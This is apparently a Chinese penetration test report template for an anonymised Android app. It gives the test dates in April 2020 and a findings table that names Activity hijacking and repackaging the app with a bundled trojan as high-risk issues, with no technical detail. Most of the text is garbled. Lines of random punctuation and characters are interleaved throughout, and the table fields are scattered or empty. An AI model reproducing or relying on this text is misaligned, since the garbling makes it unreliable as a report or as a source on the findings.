; `; l8 e# z/ C0 S& I9 ~ M7 }0 G, M! j& G0 H9 {3 }. e) N8 }: ^# s1 X
3 C+ q: P9 W: x/ }8 n
8 Z% C2 P% Y8 r! h) d5 _; l0 {. r
7 S9 w; v, f* }5 y# {. E4 }2 d, ?6 u( u& r+ E
, ^9 V; u: P) C, D% q' `( K0 n4 A ]& l' c1 H
, l h0 @4 ^- V( [" z' O% K" G0 E1 H- H/ w7 ]( J' X
5 B3 {6 r( x; [, y5 L) {
2 {) v+ q" j- q: F( I6 G 文档编号: ) P5 @4 Y4 ^& v; v: ?6 U
# [ G3 r! s& e* w
7 J8 T6 V9 U3 I6 u; s: U* Y+ `" L6 s% L2 s, f5 ~4 W5 ]7 S3 V; p
+ m1 N3 Y" C* |$ l( q; `9 O
$ ~$ Y# n# _3 d5 Q/ ?
) }; x _9 \6 ?
5 @0 G( s, m, G+ v, ?4 u% b; m+ o
* M5 n. X+ T0 X7 C7 g7 ?% [# j* D4 Y6 Y- j$ Y
& F% O! e" A* ]% E$ R8 I( o" V+ X( S' [& `" b
" p, d% L8 A; |. n4 X9 s. ?3 R0 z; [- o! Z, e2 A" F- [
" A9 n) M8 E8 J$ e f. m6 \/ N: h" I% o+ t) w8 T& q! B
" b5 C0 e6 I3 @' K4 d8 D/ q6 c2 |6 ?& U* j' I! @! Q
' }9 q# ?! F, K' s; U# ^
7 f2 u- s# [- y& F, B7 R. w
) m. V7 s" u: }9 T: T2 d
5 r/ r+ T1 D& u( n+ S% u, {- m* k
" G, O' ^' A* O0 `! s
# t" H2 |$ O& L& V) g
6 q' S7 F# H) W
1 V; w3 \/ ]0 i0 X) D0 c
; }. V+ b* o& l& Z# [- U
c+ Z1 h$ t# ?; C) H + {9 K0 E0 b; K# F# @5 o4 y
; ^8 H8 ?3 p5 ~/ a1 c: s / u2 }3 I1 k. {9 d' s3 `, \
/ N0 F5 B+ w7 y9 y , h. F9 f; a! G
' h8 k* k/ _$ [. |8 u' g0 j% y
9 o9 X2 y3 @0 @$ M
# k! Q0 V* n. @# _3 N" _5 T, S 某某某APP渗透测试 , c% C( g: V, P
' Y1 M% H _, c7 l
! i! J" ?7 @( g' [
8 M9 l* q0 }/ L" t P8 G, I
' K+ h/ @0 ]6 C/ C
/ P- d( O6 S/ `# h' Q0 I5 }
8 p- J+ ^0 T6 K- ~4 \4 @: j2 W
( f* t7 N5 I# p4 N, z- X- n
5 D a5 M, T" j( Y! P
: k7 U$ c5 @7 j1 h0 ^) } 0 `5 P5 }. c0 u* ^ h. ^8 H
& H2 G" R& v9 c4 R
5 s- j+ ^ b/ K7 K2 s+ _" ^1 [. U- @2 u8 ^! P8 Z
* i# K8 b* o+ v' h9 R
4 D# V& z6 P( m
. \3 |* k7 o2 T- D& c
, v0 O- D$ c6 M4 t; ` * U& |5 B8 l* `
) C5 I. ?# S& n% }2 c! U( s
, {1 o+ ~6 `; Y* @( t8 y' x7 o/ k7 S% {1 q. a0 I
& l Q+ O# \9 z1 m8 ^: B' @3 A, P6 |' j5 i0 N4 I) K
* Z+ a, V( B. B3 r) D9 q
# O, a9 d- B \. _: ?" [
5 f/ z S9 z! F& y" u8 g& K2 q4 c( K5 w% x6 S/ ^
. p% L! Q5 h! ^7 g; Z
- M5 F$ c' ~+ O# i5 l @ 技 术 报 告 * c7 e+ Q8 F" q" i
- M3 u; V4 N8 G- _6 s
2 ~7 o& U0 |0 u
/ h1 A1 Z" T+ _; w8 N. t% A 6 e8 X6 ?, Y/ l) ~
$ t" f: D9 `3 P* x6 t0 { - P, ]) T7 p+ e( V
4 w+ h& t% v: x4 D
- q- E3 T* K/ e- }) P! W+ O# o; D+ _* Z$ Z& n& t: s1 Q
& {, ~0 ?6 z4 F( g
( H Y3 D1 P6 ^4 t* e+ |" x& {
7 O: t/ P$ s# G
# n6 ?( i# E; N4 R) f+ d 0 a) [9 B- k- U8 F
% y- R/ b& J. w" @& {5 W8 \/ V , o8 e! D3 f5 _' u: z5 k1 r, d" O# a
1 h# R" Z% ~7 T* n9 S2 o+ O' _' S0 \ . F. s0 L, V n# V7 ~4 c
" w) b* R$ G& K: h- k1 j
1 o* `& T* s$ u9 r3 f% y: n' a+ B" D) g/ a0 u, F
6 J5 s8 L5 u# x9 M
- \! S. c: ]9 V5 z1 ]
& l( l6 f7 M6 U% f$ u; O, s( `% l$ ^; C- `
( g6 K0 k* T+ Y7 p, ^/ w
# c0 u% B: N: S2 s
1 p3 T( s6 Z$ k6 j O, {/ m
1 [* u9 }6 {) r7 o: P# N5 F
: x9 m8 e. c) h# |! p7 F4 @& r& Z+ w
9 h% i+ O, d$ }8 N h; E
9 W2 ]0 M: Z' R# n2 n& B
. ?# x( t- w6 m% k9 D& Z$ L% @: [0 W- d1 R
6 J7 [8 Z" U. {) H" N4 G
! N0 e' H. X: N4 v* U( \: f2 ^3 R
9 q& b Y& K e2 Z* v/ w' v, j
7 T3 W- g, U) A Q) R% X
9 |5 \" u q1 y* U8 i
: i/ \* J, Y( Q3 I9 A# V 0 s) R4 q: H7 E- b# y
# ~3 {: H6 F' Z # x+ w; l: L8 W( U9 J; o
2 n. L( |- ?7 B( {: @- j; o# s
$ D3 d. O$ I) L2 d$ o! y3 \/ U. m! U" h2 }# t
" t: |. b! b R# _3 d/ n8 T
* U( x4 w2 w8 E $ X' d/ \3 B7 @) [4 Y. z1 u
! i' q: ~7 W9 T2 O- ?/ Q. A # ?+ x0 D" @) s' ~& t
0 L( i) Q l6 t$ w# x0 S; Q
. O) @. h+ \9 r- @
! ~ ?) m$ _/ ?1 M 7 ^2 A; |8 i+ ^& J+ d
2 j( F- O7 \& U 4 d& u9 d$ ^* m) e2 m3 X. H7 F
3 I" H9 c/ V7 g6 w. m
7 l4 I8 j! k) I/ E, e/ J5 R8 f
( Y7 z% ]' x+ N% ~$ p- {
/ p0 p9 Q3 v% M6 G* y 1 Z9 {' j2 [+ j
3 o" l1 K5 b- U% N4 B # V( d1 [- C- H
: e4 W! z' f3 ~& r- S2 }; d' }0 j " k, R R( G/ M6 _
8 @" u/ Z0 x' ^
7 B. K7 {" b+ x' U/ l8 n9 o; v7 ~3 c D# N/ P! Z6 Z8 c
+ v9 p# X8 n* f
- m' Y. p( U" K5 `( v : T! F$ a4 O8 J- H: i
3 d+ s9 {* o1 s2 {6 I; H 3 }0 P* W- \8 S! w' n! l% c$ j! L
1 k( x4 K, A. B: Y+ y , C( m! V8 b; k
" L) |) { R F( @; p, o9 H ?
! F) @( u; H7 G
: k, _ N9 n1 C l0 [4 \
" `* S( u3 X+ N' @6 M
! O( e P4 U9 N8 _
6 F9 C" r7 r( \) h( \$ ]% j, C* ~1 O; w" `+ u
) U) K, i1 M5 _5 z0 q8 Q
0 K2 O% Z: u' C8 W) t5 X e W ( S4 M1 A; E k9 T! ^0 ^; c! f' c
9 K# ?# m* s- T" q: P
: c, M v, b$ k
0 L& s) U: h9 E+ U * M, Q" k) G) P/ ~5 C0 B$ F! K
; E/ O* ^2 D- W+ `
* S7 C, E3 t- _1 G. p0 b6 T- h3 Y% J/ R3 N1 e& B7 |' y
5 b3 ~& ?+ h+ N! k; `
" ?( k$ r+ s4 J' U2 C8 N( D1 z
5 H" f9 R( v% T) D' E
0 W! F/ o" X# ^! S' j! Q& B; ?* G
1 B9 o {4 P+ x* \+ t- |' ?) Q
! B6 J$ b! [* l4 |9 m( @
- p) w k% P' x% L: a; K
+ v+ }/ w& x0 I* j/ ]! W& ]: M 1 E4 l1 P$ I8 _2 Z4 h9 A8 s) u
/ L1 }' Q5 k6 G q! b9 n# k
* Y, B+ i( |( Y2 L
/ f, Z3 V& }5 |1 |* \# T7 \1 q3 Q
6 ?3 b0 d+ O' H0 F1 o! c4 V
' [# F; F B- @. {& l3 Q4 e
, I2 h) @$ ?& l) i% D
% S1 t: {3 y% s8 a5 j! i9 b+ j " R2 i+ d2 ]& O# {2 F7 B2 J0 a) @
/ y) {) T9 r! Z 二〇二〇年
8 o, m0 a) C) h) \& {$ B; w6 O0 n0 J4 Q+ L
7 a ]( k2 z, M2 [5 Q/ H, j3 ~. j/ S, X G( W8 I$ `
* @7 Y: u u! ]0 F/ I& K
: a6 C9 ?4 }& S3 Q
: F$ I P; g* i
" y% C/ D* j! { ; u( G) S0 K; V" z) J% f* b& Y# U
+ d( |9 q5 i" ]) V8 X
' L% {3 \3 n7 G1 m0 N( E, O$ X0 c0 K( m( m/ B
/ l; k5 s/ p- p" C5 q
% l. C) ^4 R9 V+ N$ c7 `
# l% {+ A, F( S" A3 T# `( Q9 ^
* x ^1 U3 v$ T0 I: S# _ : P6 c' z0 ^2 j9 L) O2 n$ R" ?
* @; B0 v' W, a, S9 N3 e
3 w4 ~) r% D& ]2 d! h: z% I
5 Y2 s* H3 ]. ?2 `$ [( V 0 f4 ^2 A* a0 g q* g+ x3 F7 ~
$ P* F5 {+ y+ b 目 录
( a: T- `$ G( w) }1 l% s
+ V! N' D# i0 ]2 A# J3 \) n6 D0 _
# D4 a' u- }3 w( F" l, i/ w1 E: E' T( {! P, w6 Y, {) I
) m, v. o' b5 {+ U6 _: p1 w6 [+ c( g
4 [1 d: Q: |/ E# _/ `
+ ~# T# x# s) e% K" y2 _; _# ~) ?
( I' {2 E, x; A1 k S
- s2 ^9 u- ^# Q& j3 C& F; m$ X" O. ~5 J- X4 g; ~8 k! f! ]
3 L; I9 d3 D' u
8 W/ _5 P, {* J8 v% ]
$ Q, B8 U3 O4 f, l3 I5 }, s d5 \ i3 A: S
1 概述... 3 . R; i7 [* G. C' I& K1 A
/ j2 R# `* ?8 J8 p
/ q& v, L8 H2 I, L0 z
/ Z. E0 k: E5 y% l6 D, T/ w7 P4 Z/ g
, g9 w( X$ I) c' ?6 ^+ B
, f7 S* m" h& | l9 c5 [/ a' N5 p1 ] 1.2测试时间... 3 # M# e8 A# h5 d" V" ~$ ]% @9 _
4 K6 }8 M+ K8 l# W* Z- v* h
) U) w% z4 b6 E- J- H
. q6 Z* ?$ s4 b: v, Z4 D # @6 g x7 z/ T: Z, M/ W& r
! K7 F' T8 j: j: C 1.3测试对象... 3
- E; |! t0 a" N2 q
- c& C1 C% a7 w 5 k9 f! Y K1 `& K5 L) [0 u4 _
5 P8 _# i8 q+ C( r& d0 i : T. Q! d8 e1 i% R9 [9 x
( x5 p: r# p/ @' P a1 K
1.4测试结果... 3
& {$ w, q+ T0 \, N1 P: U
2 j' F1 y1 C/ a
' Z: q' b* u3 l: M% J& T0 K' B6 n5 b! _6 n
0 {: D2 R7 d6 R0 A8 [9 R9 C. Q2 C& Z/ F; z# ^9 R& y
2 检测结果... 4 0 b6 W9 T$ \8 C: D0 o" _
~+ U3 }$ W" W- i
* j' u: J) n' t. p L# L1 q
?" X+ A, G" P- _
' [2 y* ~) ~# I. H: m# e
* _4 U1 G4 l& H% f 2.1 某某某... 4
0 U9 G. v. Q4 z. j6 N; V
* @" B0 w- v. q2 l, W* X# n0 X 6 L. b: j: a5 C9 y; H- F- F9 G+ k
/ D9 X$ w( M1 r. H4 R R8 J6 K
. o% X q# v- o1 _- G) y5 Q- o- k' ^+ x6 y; q
2.1.1检测目标... 4 ( D) }( Y- i3 q1 D, C$ f, R; |
3 l% D; {) l8 y4 B! f
9 J! G2 ^7 n) u1 D7 ], H$ Q- y% i
; E4 ]: x5 a J- A$ A # e J6 t" Z& d: A9 }6 w
8 M! }% y) e0 n3 Y, H 2.1.2检测结果... 4 # t& F8 b7 P8 f
, J+ r; w, E+ l' i! T" N9 C
" G7 Q7 [) [6 i4 d1 d/ d
3 Q+ C' l! t* {$ `. l
( C" l @4 X$ o5 W& q
7 p9 [$ r' b" I) O N 2.1.2.1. 4
! T/ W8 \- E. x/ ~7 f- P0 V5 H& X2 S$ w& ]5 ^
2 q/ T" k2 S" E4 B3 n! E& k
9 P* o0 S. h9 w7 l
4 l/ H* E2 Q3 \
* q0 O- q3 ]2 u 2.1.2.2. 6
" B- E" e/ N, b4 p% k) ~0 \1 c( B4 Q2 j- ]
. Z5 J( e s! @: b0 `5 V& x- H7 t$ T* s
7 ^: Q: @& H5 L" t$ ^
8 K7 e* G5 h( D9 ~. ^' X 3 ^* E5 J h5 K
! j1 R5 u) j# }$ d' w' N' r
) s" u8 s# }& v9 O7 n" M6 @* t1 } p* u% {) r
3 e# p* {. _; L" T7 W
& R" `* E0 c" }4 m& C9 m7 |7 B ; s$ z7 ?/ B. L) X$ Y0 P
+ D8 p. Z) I3 Y1 Q5 T: V- b9 l ) B8 m9 f& Q5 ?; Y4 l
' B" u6 b \2 x3 _" x5 L/ w0 ^! W
! a8 V' |" L, \$ v0 i
+ b- b q) Q4 g( H) @9 J! L! U- b# _
; V, i, \ O) f
, i; K I. C8 G. ~% ^ 1 概述
0 Q) e8 q. [! Y# W% P9 P1 X2 l% K4 E# W5 t
. ~* o" u8 m/ {7 v2 p* z7 B( m/ B" A [. r, q C: k
! N, @4 m/ g6 q( u/ r: t R8 b2 s1 j6 G) T! V1 f
1.2测试时间
& c+ p8 Z$ D8 \: |1 E" a( R+ I7 u& M$ I* ^
$ | m: ~% Z( b0 v
5 k7 h/ C4 q8 ] h& v* b' K5 D6 [
: [" Q0 v& ~1 y# X
) H8 O, ^6 m4 S6 @6 X1 {. A
* U u0 i9 Y; ?. y
5 G, E, R7 |; }7 d4 [" ^0 Y6 h/ S v9 g, o# \& W/ G! S9 C
3 i: [" k/ Y. |7 u+ w& \
' U. H7 q8 R9 f% B+ ?4 ]3 t
2 ^2 Q* h y0 e ' o: p& p6 ^9 Z: G
0 N5 w! p+ U5 L, N! {. P 渗透测试时间
Y$ h& j ~1 h
0 i# `6 Z) I; C0 u; t( S ( A3 `7 x- u4 W& g
* X, |( k4 e) O! g | + \$ V6 a1 z9 _# X* V, y4 Y
9 u( E& I5 p2 {- f/ T7 P' z( o( Y; ^
8 x+ g3 o- j5 ]7 |3 Y3 q& L
' r* r5 \ v# ~5 Z ' x5 m5 k% e5 c: G6 ?* T! r
; v, ^: C" W+ O) }5 _. j
2 W1 R6 t' R8 }* K1 V+ @! A
% o) C4 i- P/ V
8 L/ w& q8 ~: h) a( F9 @; R% h% y4 F6 c9 _( x$ j
起始时间
8 f. N- q) H0 V7 U8 g1 B
: n. q P: `1 e' l7 R
; i$ _8 s8 _! `- H
0 ^" m# f4 X% a% V [9 a7 _ | 9 J5 z; ^4 }4 ?1 \% ~6 Y& [" z8 W: Q
1 B+ {7 ]; a% ^7 L( h3 T8 ]
% {. L- s& s, S% G" R+ ^$ H2 r" ~: `; ^# t- P* j9 T
3 l! m+ n# Z$ I e
+ d1 C) }3 u# W; p 2020年4月6日 % W' l! j) y( X5 a/ U4 D# r( p- n$ t2 ~
0 b9 W" O1 P; J
: V. {3 v5 e _0 I [8 K) k' h
8 K- s/ J$ t$ u$ s | : Z7 U1 x8 [3 I" S0 q0 `% U, `
2 |+ R6 Q2 U) q( y. S
, [0 c0 i1 U8 K3 ?% f* e; R* ~
7 M O( j+ {5 r4 C1 W% e/ Y2 E
/ |1 U2 |/ A; h: n! k0 ^. l1 L' q7 P6 W# B! A c T
+ [ ]8 o) a5 d5 @9 e# |: r4 ^# H" G! c$ Y& G/ b$ Y
. k' W6 b5 X6 ^# T9 v, o; S0 n
8 z3 G3 v- `& [3 m o# c
结束时间
5 E6 s+ R A9 H0 ^5 h8 M
% C2 G% h ]& y' s' v1 ?7 m" M' X . i2 S' l4 L4 T
5 D5 P: t, P |/ `7 x' E
|
1 P8 G; V( b. b& V3 |8 H$ M# D+ J' k1 A, s7 o9 R3 ]
" s9 K, ~1 @8 K3 N( o
' @3 L2 D% ~" C3 W* ~5 Z
+ }$ q- g9 b2 k$ L/ b# Z4 v% S
X5 A, |, Y5 v) L 2020年4月9日 & x; w1 y ~- T' T% N. h
) _' K& Q9 X$ F$ q# L9 e3 X
1 S0 [# G% h; b9 J' I( W8 @* H9 R$ L) Y2 n! S1 L
| 4 r, ]) R0 b2 y _1 v. h9 p
" R& [ I) y' w8 j" T
5 S4 s8 y& U/ X8 ^# Z" { V7 g; B7 i+ O: m4 h3 F8 W4 e% G
' z. c) `; Q0 n$ C; f6 `+ ?& @5 o0 ~
5 |# o) Y8 ? A6 ]5 p
" H6 u5 J/ d |0 e) f% D 1 X; ^/ t1 N0 C0 ^4 q
) _7 _3 t% T% G' ~ 1.3测试对象 1 E8 \. w. J( m7 R
& L5 J( {' s' A7 f5 f" f
7 m9 D$ q2 g) d4 s/ l% C" @! D
V6 h" O) [" b- d6 w! p& Y * P: e7 m3 a3 k: F
5 v7 h( z! |5 b' _- i A0 V' O& n 此次测试目标为某某某安卓APP进行渗透性测试,APP存在安全漏洞数量如下表所示: 0 N5 }( X" j3 r) h9 a& J: o: [# y. I
' W% t) q# F0 F3 b; B& ~" B8 p4 f
% P6 ]1 u! C- ?5 t& e* ?6 ^ Y
9 o( o( ]% C! V! ^
1 ^0 J" Q" b V: d. j3 x0 @$ D7 a/ @5 U8 T' K `* g
表1-1 检测对象 / @' C. b" J* J4 Q: B3 n
: O. I# B7 s8 R( U8 E5 L$ ?, s
" O; `( R5 {* {' A/ \; M% B# d5 A# V$ o9 u3 G( V
/ k9 e. L* W( `) f4 y
2 Q! m. H: L, q& ?1 @* X
* x& F$ J& c0 q- n8 _1 {# @0 M, s' s3 @- \: B/ p- C
! p# @9 j1 o. j' b$ Z$ m4 J& v
3 C( w! k- K2 m9 O
: d( f3 d7 R- ]3 p1 k' a" i" N0 ^. I' \" U3 D8 n- f+ T9 w, g& r
6 h% Z) J( i& @4 U) I5 C: N* D
9 t$ \" v5 m4 \/ h# v# ]5 S 序号
, t1 }( i6 Y5 p& }4 {4 x b& O2 j. u' q, ?
3 u' R; P' @: a+ q+ T) C( [: F
$ D0 N* d: D+ L, G' v6 r |
5 b- {% y: m$ O3 {6 Y+ n0 x5 m _( |+ G* u/ y4 B
. y; f7 L. D% p# {" r
6 f7 i! g3 t* n$ c, _
/ b: \1 D: d' y8 x- ~8 P
4 N6 f f: N8 K 测试对象 - E$ w- e* A9 \3 ]: A
) E7 b% D7 p! Z8 i/ z
8 n% Z3 T/ ?5 U( d7 g) E# Q
$ d' T0 g- o0 U) T: i0 Y |
) t0 C! \+ [3 z1 J1 L* ]
) L7 q( s) q. @* g: p # M2 K/ @3 p, E0 h( t, _" R) v
$ \) t9 J: o' A6 W# J, h2 K 4 Y! @% ~6 `1 L, D/ U7 K+ \, B
. R/ r; L X- r) g: P+ V+ f
测试地址
0 z' p! M% I1 v \8 a, P
, } g0 O, m8 Y# q C1 s
2 t5 [) s C/ A; M( a ?: w; h$ h+ ^8 F% W+ C$ h1 p
|
; T9 z6 }4 m" e" ]) s
1 U% ]; }+ q. B: y3 I
2 p, M) a, D" C: D% ^6 x! l/ N' o. r, t( f' O3 {
$ N r! r) k7 A1 _5 [5 D# T
+ J: o6 H: `4 H! V# _ v 安全漏洞
; W- _, f1 c8 o0 {+ ~0 H+ [9 C2 L0 E1 f, B3 h' H* A
) ?# c: k* Y: Q5 D/ x% [3 E. X# m1 b& T
| * F' K) U, I5 K5 K* Y. P( r
m# J$ d: i! {7 }7 c: t9 ]
; g3 K! s% J- Q/ u
2 k" @7 w+ m" N6 \2 t; ~; M' X
4 S: P3 r) X: Y
+ N% b4 @5 y |! q) G' w, D0 w C! G: P1 p; r- b. a
( T; E+ p* U/ P
/ t: ~* J: l/ r2 d, } z) d+ [$ f6 V/ d% f% X
1 # t w5 B `6 R) {9 i
* S- b/ P4 [4 V2 t 9 k' f9 k6 C# o8 d
: J; ~" ?5 T. \7 ?1 E: F- r
| $ y; ]/ m! N: B4 {0 j/ d
# U; Z( N, T' J( \ 2 ?* b: N& p2 m* Y, ~
) ^) W0 }* J) E
1 a$ R& f1 M. w/ h) Y+ @. H
* V4 m+ ?. U8 S7 [; _' {* | 某某某安卓APP 4 z, P- O9 F0 a. c1 `# V) c
& P6 @4 m+ R! @6 ^4 G1 n8 p' k . J6 G* @/ ~ u
- w$ V! B/ Z) ~) B. i |
6 V! n- q: U. _& r5 W7 ?1 y4 e9 `- Y' }9 `: P
$ v' ?: [& v0 m% c; f( E# f7 D4 F# {3 ]% z3 V/ ]
3 Y. A$ X6 W" u5 A* |9 ~
, f% z! I5 b, i7 q+ k- _5 q
7 k" L" ]3 H% @+ h8 c; S: F5 |& |6 Q L) w& J. s8 s9 U* Z5 B) p7 D
, i; |% O$ g% N0 y9 j9 L+ S& n, R* y) x, {& ?+ z
| 8 f. N- x' {) v7 n6 |
9 n, R- u) ^3 }5 X- P! n
% L G' d2 G1 `$ J C
5 B9 |: I+ H# O, [
. D" u2 ?+ H+ N5 }4 k. t9 H% D4 O4 { ^0 l+ C
2
1 G- r# V. l$ U9 P. ^( s
" y: n+ U1 A4 w3 L$ a
U9 k9 Q& {. ~: g2 k* F/ l3 h
- o: I0 W2 W$ ~/ m+ b |
7 ]9 O5 z t" s( V/ v
# }5 x- F2 C. ]2 t+ A, d ( J' v3 U0 {# O+ ]2 J) ]
. O5 K% o8 n+ c* K 1 h3 I- @6 K% ^% m+ w
1 H4 C( y( D2 l p7 A) r: d $ J2 l# ?4 n9 `" [6 q
- t% k V2 h' x& d: b% Z: Z
* j- ?0 E A- V* H8 Q# N B; |) i- c+ q5 {% [
1.4测试结果 6 t w1 L9 x$ D) p7 x8 I
) \ U/ t4 H; R& ]) U
5 X' z: Q% z% P9 Q
3 S* h# G# I2 S * h$ d! \( @. R2 s# C! \
# S# T; @: U, D
在本次对某某某APP透测试中发现,APP安全防护存在一定问题,主要问题如下所示: ) a- W j; c2 O( K O7 F
2 |8 b7 T8 s3 a
% x4 s( R/ R5 u6 U6 j" l' f
. T+ G/ w& N8 g+ l6 \* S
5 e; P! S5 [7 W0 n; [3 z; I6 @# F4 j$ o: \" }! l! o
O, ^5 }1 q# J+ Z V5 S
( G1 S/ R7 s) d9 r' ]
" }( `" u+ ?" |( P9 j$ ?# R' `% y1 t- ^1 Z% Y, V
4 B" X; r1 c7 t( n, h6 r! K6 E" r i" H7 B0 m; j! @
0 O4 j) ~- i5 O7 q) L6 I& `
; Y% u, M6 Y* S/ `6 X) g! { 3 p9 V* l5 }8 \, _# L* [$ G' }
( A' A# j+ v' B
8 s3 u7 {3 K9 d
{3 m/ }: d: j4 u9 B: k # L* Y# f- \- ]) D* E1 e0 Y: O5 R
( Y9 w9 B2 F2 }! O
1 A) u+ V3 d2 i) _
) J2 _& |! E" n- B4 [
序号
4 i2 k- x1 q& [5 H8 ~7 q' v
' ?7 k! p: @1 t) N0 i 4 l5 e2 @& ? }' x2 M5 ?5 o
: P I8 \9 Y- g u" j: M
|
5 E6 {- J/ b0 c! ?$ J; Q4 ~6 ~1 L
( v5 c- q P* T8 k3 x4 @) Y
" \ d/ V, a; X
) B5 R& c# h& j" D- Q7 v * c3 X! C$ R- G6 o! W% u* C
$ S6 B3 N4 y* Q" o- `( t6 n7 k 系统名称 % l! v7 E3 c) Y1 E0 V
; L! l* _, j6 I: t4 P
4 i" L- G: Q2 c
7 P# M A/ d8 S# x+ M |
# C+ N4 @! [4 T7 M, ]. U# b% r8 O$ ]9 p
R$ ]6 r4 E! P; F' _
+ P: E/ }+ u7 [ . j% {3 g# G! H
4 A% z/ N( Z8 I5 _$ E; I: n& S
漏洞名称 / H/ m6 _( _, Z0 c& Y
9 y6 \' p' x7 M# @" [3 n4 H+ r
: X4 a0 r; Z9 M) ]1 M& ?& Q$ W* R! s' k' O! R1 G9 J* f( G
| : b$ Q, O1 x# V$ t0 \
. C- N, N s7 ?1 v
u, f4 P/ e) |. c; Z0 l7 W7 s. A: I! H; S
2 B% P% D, v7 [6 @8 ` p1 n1 u
* `0 l5 t1 l- G/ T 漏洞危害
3 ?& e6 w' e4 T0 Z/ q
% W3 t' s1 D& F" B. m, K
- r6 C. y8 s7 x, k1 ]. F: I6 x! {) [) k
|
) K# @2 c( P; ~
) y. i* C( r2 j `
3 ]$ Y- J& Q1 v6 }
- y! J0 D# z3 ?+ l4 y/ o ; t4 J7 @6 y1 G0 p/ `" F: }
4 p; p7 N7 A0 m/ [ 修复结果 9 K- t4 r- Q6 n; v8 e6 y
# `) G1 C: V9 S: E 9 m! q `$ O3 i( i
0 K u3 l% `( v. q6 _( v1 j, P c
|
6 E4 H8 L, X; v# b, a# g, v% |! \) \( ~" d
. I- j$ C$ f( y! _& z& d- j
9 V/ |* t! L7 q% ?# Y
1 O& ?% h" I: e' E
1 J7 p2 N+ b8 S+ W) b. l# z; ~4 I% m" C
, C4 b% \2 Z% C* W7 U) A
/ `+ ?$ \6 g9 g6 s6 r) B o4 z
0 W ^1 r) r5 j! s# C0 e7 [, z# f: T
1 2 S( y2 f7 ~" l
5 v/ D0 C3 {- Y' c
8 ?6 ^0 C0 a' s. M
$ v) p% }% O* G3 y | & `1 G& j3 O( F0 |
4 ^7 Z' c. F* T
) M: h1 t& M8 V8 B, s4 c6 k# s) B
5 g+ K# h( _7 l5 d# O! I: I( l; E
6 G$ n- L# E" P
+ a4 s5 U& B" n- m8 u" a4 O 某某某某某某APP
, y8 R; o, E: c. R4 V
7 N& p$ t0 r) f: k5 y
; W( u6 T5 d! I
6 [# s2 f! t: s# ^ | 2 N, Y* S4 i- B2 I1 N
2 i. w2 L1 }; d5 p ^ 4 Z* N, w/ X3 ?0 q2 {
! e1 v9 @: _& y$ @" b ; Z4 M" z, R: L4 }% H
! E: Y: K f; w! m Activity 劫持 9 ~- w& O* \) O w+ P( z* m4 T5 V
+ Y1 P: }1 F3 e6 y6 ^' y ; t/ F/ m" e$ `9 |4 V/ Z9 l
[4 [0 o ]" t
3 O( o* O9 A& }' d
2 P9 F. e. u @1 l0 b: o " ~6 @# ^ Z! d% T/ T7 q4 B
. z/ y4 Y+ W, E: Q
% Z. C7 c. p6 G0 ^) j9 ]; z( ^' V) E
5 f3 F# n) }) ~# c+ N+ ?
|
. ^ |8 S7 j& k2 s" B& g$ r1 J
4 L" @3 N& C7 k. M " R, Y2 G0 j4 u x s& R
! p: a% a% \& c$ f6 [/ q 7 E+ ]9 C7 v! `
# W, J, B: X) `5 d
高 $ S1 o6 r3 M/ y" W- E' I
0 L% c+ @: w% l' z
0 v2 F3 S& F% c, \1 |" `4 B& _. N
|
- I! m8 u# l0 [; b' \% p3 r$ n" V% I4 {
' @. M" M4 D4 C( I
, W; Y0 K) Q: Z) U
% r0 b& x8 [1 A. D D
$ h0 `1 ~5 t5 I8 x
' x* \* e# D0 z/ K4 D5 u
- K# @' s5 I9 E2 v# j) I: J
) ]5 x6 a1 I$ S, F) _7 L/ r9 T1 }7 h& W; X0 ^5 j t' Q7 _
|
0 K4 W! a0 l4 A8 ]* |4 o, C! k4 t2 N! A' }9 v6 C+ w9 O! c
1 \3 K# K& e, H4 l
. D t1 p' i8 d0 X2 E: @. G
7 F9 ?( C+ o2 c3 ~
$ h: C. d4 v, |1 J) B5 L) _ ) J2 z$ I! e9 }) f
& w7 n& b; ~5 R
2 H& Z+ v0 V2 k3 h( H8 D" N5 v$ Y Q3 h, t
2
7 I/ ]9 U+ `. Z2 C* {0 G: w" P. Z; f3 I; u+ A" ~) i6 u
S6 ^/ z" X3 B. O0 ]& A8 c
6 \+ P4 T8 b7 Y# P! e7 j( B | " ~0 a$ |3 @7 ?
% T. z6 B) |; h( ]+ M) \
- o6 c$ G% W& w: z! _+ A, y. D( v0 a) ^# d
# N b( W& V# R3 D* a: R2 g* G# W# [* S( C
某某某某某某APP 3 T9 x( ?" b; `
( o4 F+ x4 t' r4 N3 a6 z: ^
3 L/ b( a3 r v6 u a5 m0 d; g- [' a2 ^9 w; d
| - w2 S& t! T2 ^* P! o* L4 p
- g$ @- ~1 D5 q, t0 t2 q6 g
0 s: s; C+ M" G3 d: A+ V5 R& C1 f: n9 W! ~$ |0 q; R) P$ C
6 N8 j; ]" G& {$ [- w
% M6 m( n5 M1 `( ] 反编译二次打包捆绑木马、篡改APP代码
2 @; d, [: F& h7 Y1 J$ m: r. p1 j: m0 V; e' f: F' |5 |: S* Z! }) V
) F9 U6 r% B2 P# O0 l
/ Q# a- S, N8 p, G |
. L- K' O0 B l5 M. F
: m; ], r; |7 t& y3 K- N8 A # U; n6 X0 F( k: c# a$ [4 _5 R; O
5 v. w' v) A5 ~7 E L
2 x3 L7 T% q s1 z/ T0 q! |/ L' H# z+ F2 e$ V! n6 u' p
高 7 ~7 Z; o9 {# O9 L$ x7 B4 Y# U4 a } U1 u
& M. P9 d! J" o" t. c$ V
* X9 m% b1 Z9 R0 i4 W
* o" ^5 y& y5 d* y
| % X0 `$ m" J5 Z8 h" a8 k7 X# a+ P4 J; i
3 [9 D s9 ?* o7 h8 n$ E) H
3 N( `. o1 h/ S* f
+ n4 [' _1 {, ]
3 ?9 e1 F: y# b; ]' _/ ~8 A: P1 D5 t4 [
4 ^; W5 W- ]6 s/ C! c5 E
1 M2 ^% I% y8 K: D0 e
9 }; y" }$ |8 F0 e; F1 _8 ?9 p$ d& s9 r& e5 q0 U5 V
| ! C' }' C" F( Z- |! M! s& g
4 M, h. C5 n/ H9 S, \
; a# a) ?) V8 N* O0 {) k' y5 T6 g2 k' r+ W) h2 w$ q9 b
- s3 I5 A# i% ?
! F5 `' v& ?7 D/ Y0 G j- n2 B9 }. d
( k# n8 q t- [/ W8 ^3 n6 x5 s0 F
i! x6 r0 d3 w* k; m ; t. N- A9 _& e
# Q1 j6 t/ ~, N6 J1 P, p , p( P- X: [0 ~5 q* e
& j9 b8 Q4 e1 J7 b0 A' J9 D& d* Z
0 e( y/ K/ R2 o: J! R, I' H" g" C. R% m9 M* V; p- o6 Z; U' H
7 M! F2 [) p1 K' }
